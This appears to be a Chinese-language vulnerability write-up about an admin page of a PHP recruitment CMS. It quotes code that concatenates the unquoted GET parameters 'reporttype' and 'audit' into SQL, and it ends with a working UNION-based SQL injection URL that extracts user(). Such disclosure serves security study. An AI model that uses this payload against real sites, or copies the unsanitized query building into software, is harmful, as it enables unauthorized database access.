漏洞文件：admin/admin_feedback.php

代码82行：

         if (!empty($_GET['reporttype']))

         {

                   $wheresql=empty($wheresql)?" WHERE r.report_type=".$_GET['reporttype']:$wheresql." AND r.report_type=".$_GET['reporttype'];

         }

         if (!empty($_GET['audit']))

         {

                   $wheresql=empty($wheresql)?" WHERE r.audit=".$_GET['audit']:$wheresql." AND r.audit=".$_GET['audit'];

         }

         $total_val=$db->get_total($total_sql);

         $page = new page(array('total'=>$total_val, 'perpage'=>$perpage,'getarray'=>$_GET));

         $currenpage=$page->nowindex;

         $offset=($currenpage-1)*$perpage;

         $list = get_report_list($offset,$perpage,$joinsql.$wheresql.$oederbysql,$type);

         $smarty->assign('pageheader',"举报信息");

         $smarty->assign('list',$list);

         $smarty->assign('page',$page->show(3));

 

跟下get_report_list:

 

function get_report_list($offset,$perpage,$get_sql= '',$type)

{

    global $db;

    $limit=" LIMIT ".$offset.','.$perpage;

    if($type==1){

       $result = $db->query("SELECT r.*,m.username FROM ".table('report')." AS r ".$get_sql.$limit);

       while($row = $db->fetch_array($result))

       {

       $row['jobs_url']=url_rewrite('QS_jobsshow',array('id'=>$row['jobs_id']));

       $row_arr[] = $row;

       }

    }else{

       $result = $db->query("SELECT r.*,m.username FROM ".table('report_resume')." AS r ".$get_sql.$limit);

       while($row = $db->fetch_array($result))

       {

       $row['resume_url']=url_rewrite('QS_resumeshow',array('id'=>$row['resume_id']));

       $row_arr[] = $row;

        }

    }



    return $row_arr;

}

 

$_GET[‘reporttype’]

$_GET[‘audit’]

没有’包含。

 

构造payload:

admin/admin_feedback.php?act=report_list&audit=1%20union%20select%201,2,3,4,5,6,7,user(),9,10%23